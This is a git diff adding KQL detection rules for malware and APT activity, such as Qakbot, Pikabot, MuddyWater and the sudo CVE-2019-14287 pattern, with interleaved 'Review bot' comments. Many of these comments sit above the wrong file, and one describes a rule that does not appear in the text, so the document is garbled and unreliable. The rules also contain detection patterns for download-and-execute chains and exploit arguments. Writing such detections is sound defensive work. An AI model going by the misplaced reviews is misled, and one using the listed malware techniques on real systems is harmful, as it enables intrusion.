\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql
new file mode 100644
index 00000000..330a18cb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql
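Review bot: On the `| where` line, `ProcessCommandLine matches regex "ipconfig\\s+/all"` is case-sensitive (Kusto's `matches regex` is RE2 with default case), while every neighbouring `contains`/`endswith` test is case-insensitive, so `IPCONFIG /ALL` satisfies the rest of the rule but not this clause; `matches regex "(?i)ipconfig\\s+/all"` makes the behaviour consistent. `ProcessCommandLine contains "dir"` is also so short that it matches almost any command line with a path in it (`Dir`, `directory`, `redirect`), so the first group is effectively always true and adds no selectivity; `ProcessCommandLine has "dir"` (term match) or `contains " dir "` restores the intent of the recon-command list. The remaining clauses (`>>%APPDATA%\Microsoft\`, `.xml`/`.txt` suffix, `cmd.exe` spawned by `wscript.exe`) carry the real selectivity, so the change is low-risk.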
@@ -0,0 +1,12 @@
+// Title: Potential Devil Bait Related Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\" and (FolderPath endswith ".txt" or FolderPath endswith ".xml")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql
new file mode 100644
index 00000000..72bbf53f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql
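Review bot: The Description says the rule detects file *creation*, but the `| where` line filters `DeviceFileEvents` with no `ActionType` constraint, so modifications, renames and deletions of matching paths fire the same high-level alert (a `FileDeleted` for a leftover `.txt` under `\AppData\Roaming\Microsoft\` during cleanup is a late, low-value hit). Adding `and ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileModified")` if in-place rewrites by the later stages matter) aligns the query with the Sigma `file_event` category it was converted from. The `FolderPath endswith ".txt"` test assumes `FolderPath` in this table carries the full path including the file name — it does in tenants I have seen, but a comment such as `// FolderPath includes the file name in DeviceFileEvents; otherwise test FileName` would make that dependency explicit.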
@@ -0,0 +1,12 @@
+// Title: Potential Dridex Activity
+// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-10
+// Level: critical
+// Description: Detects potential Dridex acitvity via specific process patterns
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") and FolderPath endswith "\\svchost.exe") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"))) or (((ProcessCommandLine contains " -s " or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and FolderPath endswith "\\regsvr32.exe" and InitiatingProcessFolderPath endswith "\\excel.exe") and (not(ProcessCommandLine contains ".dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and ((ProcessCommandLine contains " /all" and FolderPath endswith "\\whoami.exe") or (ProcessCommandLine contains " view" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql
new file mode 100644
index 00000000..6d8e6e06
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential Emotet Rundll32 Execution
+// Author: FPT.EagleEye
+// Date: 2020-12-25
+// Level: critical
+// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ",RunDLL" or ProcessCommandLine endswith ",Control_RunDLL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((InitiatingProcessFolderPath endswith "\\tracker.exe" or (ProcessCommandLine endswith ".dll,Control_RunDLL" or ProcessCommandLine endswith ".dll\",Control_RunDLL" or ProcessCommandLine endswith ".dll',Control_RunDLL"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql
new file mode 100644
index 00000000..d166b902
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential EmpireMonkey Activity
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-04-02
+// Level: high
+// Description: Detects potential EmpireMonkey APT activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/e:jscript" and ProcessCommandLine contains "\\Local\\Temp\\Errors.bat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
new file mode 100644
index 00000000..2ae3cece
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\GoogleUpdate.exe" and InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe") and (not(((FolderPath startswith "C:\\Program Files\\Google\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\") or FolderPath contains "\\AppData\\Local\\Google\\Update\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
new file mode 100644
index 00000000..25babf40
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential Kapeka Decrypted Backdoor Indicator
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
+The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where ((FolderPath contains ":\\ProgramData\\" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "\\\\[a-zA-Z]{5,6}\\.wll") or (FolderPath endswith "\\win32log.exe" or FolderPath endswith "\\crdss.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql
new file mode 100644
index 00000000..46aad136
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql
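Review bot: The second line of the Description (`The file, typically 5-6 characters long …`) was emitted without the `//` prefix, so as written the file contains a bare sentence between two comment lines and will fail to parse in Kusto — the multi-line Sigma description needs every continuation line prefixed, `// The file, typically 5-6 characters …`. The same converter behaviour is likely to affect every rule with a multi-line description, so the fix belongs in the generator rather than in this file alone. Separately, the `| where` line has no `ActionType` filter, so deletion of a matching `.wll` or `win32log.exe` fires the same high-level alert as its drop; `ActionType == "FileCreated"` matches the "presence of a file … dropped" wording.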
@@ -0,0 +1,10 @@
+// Title: Potential Ke3chang/TidePool Malware Activity
+// Author: Markus Neis, Swisscom
+// Date: 2020-06-18
+// Level: high
+// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
+// MITRE Tactic: Defense Evasion
+// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-Property DWORD -name DisableFirstRunCustomize -value 2 -Force" or ProcessCommandLine contains "-Property String -name Check_Associations -value" or ProcessCommandLine contains "-Property DWORD -name IEHarden -value 0 -Force"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql
new file mode 100644
index 00000000..908034f0
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential MuddyWater APT Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: high
+// Description: Detects potential Muddywater APT activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "vbscript:Close(Execute(\"CreateObject(" and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-w 1 -exec Bypass" and ProcessCommandLine contains "\\ProgramData\\") or (ProcessCommandLine contains "[Convert]::ToBase64String" and ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]" and ProcessCommandLine contains "GetResponse().GetResponseStream()" and ProcessCommandLine contains "[System.Net.HttpWebRequest]::Create(" and ProcessCommandLine contains "-bxor ") or (ProcessCommandLine contains "Win32_OperatingSystem" and ProcessCommandLine contains "Win32_NetworkAdapterConfiguration" and ProcessCommandLine contains "root\\SecurityCenter2" and ProcessCommandLine contains "[System.Net.DNS]")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
new file mode 100644
index 00000000..28666930
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
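Review bot: In the second branch of the `| where` line, `ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]"` ends in `]` where a PowerShell method call has `(`; a command line containing literally `GetString]` is very unlikely, and because the branch is an `and`-chain that one token makes the whole Base64/XOR-downloader pattern effectively dead while the other two branches still fire. `"[System.Text.Encoding]::UTF8.GetString("` is what the neighbouring tokens (`GetResponse().GetResponseStream()`, `[System.Net.HttpWebRequest]::Create(`) suggest was intended; if the upstream Sigma rule carries the same string, the correction should go there as well so the next regeneration does not reintroduce it.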
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
+// Author: Alejandro Houspanossian ('@lekz86')
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c") and (ProcessCommandLine contains " curl" or ProcessCommandLine contains " wget" or ProcessCommandLine contains " timeout " or ProcessCommandLine contains " ping ") and (ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " mkdir ") and (ProcessCommandLine contains " & " or ProcessCommandLine contains " || ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql
new file mode 100644
index 00000000..3bbf2b20
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql
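Review bot: The two continuation lines of the Description (`Commands such as "curl", "wget" …` and `In the observed Pikabot infections, …`) have no `//` prefix, so they are bare text in the query body and the file will not parse in Kusto; each needs to become `// Commands such as …` / `// In the observed …`. This is the same multi-line-description defect visible in other generated files in this commit, so the converter's comment emitter should prefix every line of the description rather than only the first. The `| where` line itself is sound, though `ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c"` does not tie the event to `cmd.exe`; `FolderPath endswith "\\cmd.exe"` would anchor it to the process the Title names.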
@@ -0,0 +1,12 @@
+// Title: Potential Qakbot Rundll32 Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: high
+// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".dll" and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
new file mode 100644
index 00000000..783e71f2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Raspberry Robin CPL Execution Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-03-07
+// Level: high
+// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
+This behavior was observed in multiple Raspberry-Robin variants.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".CPL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\control.exe") and ProcessCommandLine contains "\\AppData\\Local\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql
new file mode 100644
index 00000000..e1c48f91
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql
@@ -0,0 +1,12 @@
+// Title: Ps.exe Renamed SysInternals Tool
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-10-22
+// Level: high
+// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats
+// False Positives:
+// - Renamed SysInternals tool
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ps.exe -accepteula" and ProcessCommandLine contains "-s cmd /c netstat"
\ No newline at end of file
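Review bot: The Description's second line, `This behavior was observed in multiple Raspberry-Robin variants.`, is emitted without a `//` prefix, so the generated file contains a bare sentence that Kusto will reject before the `| where` is ever evaluated; it must read `// This behavior was observed in multiple Raspberry-Robin variants.`. Since this pattern recurs across the multi-line descriptions in this commit, the generator should prefix each description line. The detection logic on the `| where` line is otherwise well-anchored (rundll32 image or OriginalFileName, parent rundll32/control.exe, `%TEMP%` path), so the file is worth keeping once the comment is fixed.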
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql
new file mode 100644
index 00000000..82745567
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Regsvr32 Calc Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s") and ProcessCommandLine endswith " calc" and FolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql
new file mode 100644
index 00000000..96c97fea
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Rundll32 Exports Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "aslr" or ProcessCommandLine endswith "bind" or ProcessCommandLine endswith "DrawThemeIcon" or ProcessCommandLine endswith "GG10" or ProcessCommandLine endswith "GL70" or ProcessCommandLine endswith "jhbvygftr" or ProcessCommandLine endswith "kjhbhkjvydrt" or ProcessCommandLine endswith "LS88" or ProcessCommandLine endswith "Motd" or ProcessCommandLine endswith "N115" or ProcessCommandLine endswith "next" or ProcessCommandLine endswith "Nikn" or ProcessCommandLine endswith "print" or ProcessCommandLine endswith "qqqb" or ProcessCommandLine endswith "qqqq" or ProcessCommandLine endswith "RS32" or ProcessCommandLine endswith "Test" or ProcessCommandLine endswith "Time" or ProcessCommandLine endswith "Updt" or ProcessCommandLine endswith "vips" or ProcessCommandLine endswith "Wind" or ProcessCommandLine endswith "WW50" or ProcessCommandLine endswith "X555" or ProcessCommandLine endswith "XL55" or ProcessCommandLine endswith "xlAutoOpen" or ProcessCommandLine endswith "XS88") and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" 
or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql
new file mode 100644
index 00000000..cb3e18a8
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Rundll32 Fake DLL Extension Execution
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
new file mode 100644
index 00000000..40b73934
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "nsis_uns" and ProcessCommandLine contains "PrintUIEntry" and (ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or FolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
new file mode 100644
index 00000000..59bab07f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
@@ -0,0 +1,11 @@
+// Title: ScreenConnect - SlashAndGrab Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath contains "\\LB3.exe") or (FolderPath contains "C:\\mpyutd.msi" or FolderPath contains "C:\\perflogs\\RunSchedulerTaskOnce.ps1" or FolderPath contains "C:\\ProgramData\\1.msi" or FolderPath contains "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi" or FolderPath contains "C:\\ProgramData\\update.dat" or FolderPath contains "C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelAgentCore.dll" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelUI.exe" or FolderPath contains "C:\\Windows\\spsrv.exe" or FolderPath contains "C:\\Windows\\Temp\\svchost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql
new file mode 100644
index 00000000..2483af37
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql
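Review bot: Every indicator in the second group of the `| where` line is an absolute path (`C:\\mpyutd.msi`, `C:\\Windows\\spsrv.exe`, …) yet is tested with `contains`, so `FolderPath =~ "C:\\mpyutd.msi"` (or `startswith` where a suffix may vary) is the precise and cheaper operator; only the `\\LB3.exe` entry under `C:\\Windows\\Temp\\ScreenConnect\\` genuinely needs a substring test. The query has no `ActionType` constraint on `DeviceFileEvents`, so deletion of these files during remediation raises the same high-level "exploitation indicator" alert as their creation; `ActionType == "FileCreated"` keeps the alert tied to the drop. The Tags line carries no `cve.` entry — if the rule targets the SlashAndGrab CVEs (CVE-2024-1709 and CVE-2024-1708 per the Huntress write-up; confirm before adding), tagging them keeps the rule discoverable by vulnerability ID, and "as reported Team Huntress" in the Description is missing a "by".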
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware File Indicator Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "Microsift" and ((FolderPath contains "\\Roaming\\" or FolderPath contains "\\Local\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\"))) or FolderPath endswith "\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql
new file mode 100644
index 00000000..6875eeb3
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql
@@ -0,0 +1,10 @@
+// Title: Sofacy Trojan Loader Activity
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-01
+// Level: high
+// Description: Detects Trojan loader activity as used by APT28
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".dat\"," or (ProcessCommandLine endswith ".dll #1" or ProcessCommandLine endswith ".dll\" #1" or ProcessCommandLine endswith ".dll\",#1")) and ((ProcessCommandLine contains "%LOCALAPPDATA%" or ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\rundll32.exe")) and (not(ProcessCommandLine contains "\\AppData\\Local\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql
new file mode 100644
index 00000000..9e9357af
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql
@@ -0,0 +1,12 @@
+// Title: Sudo Privilege Escalation CVE-2019-14287
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-15
+// Level: high
+// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -u#"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql
new file mode 100644
index 00000000..0f6551fa
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql
@@ -0,0 +1,12 @@
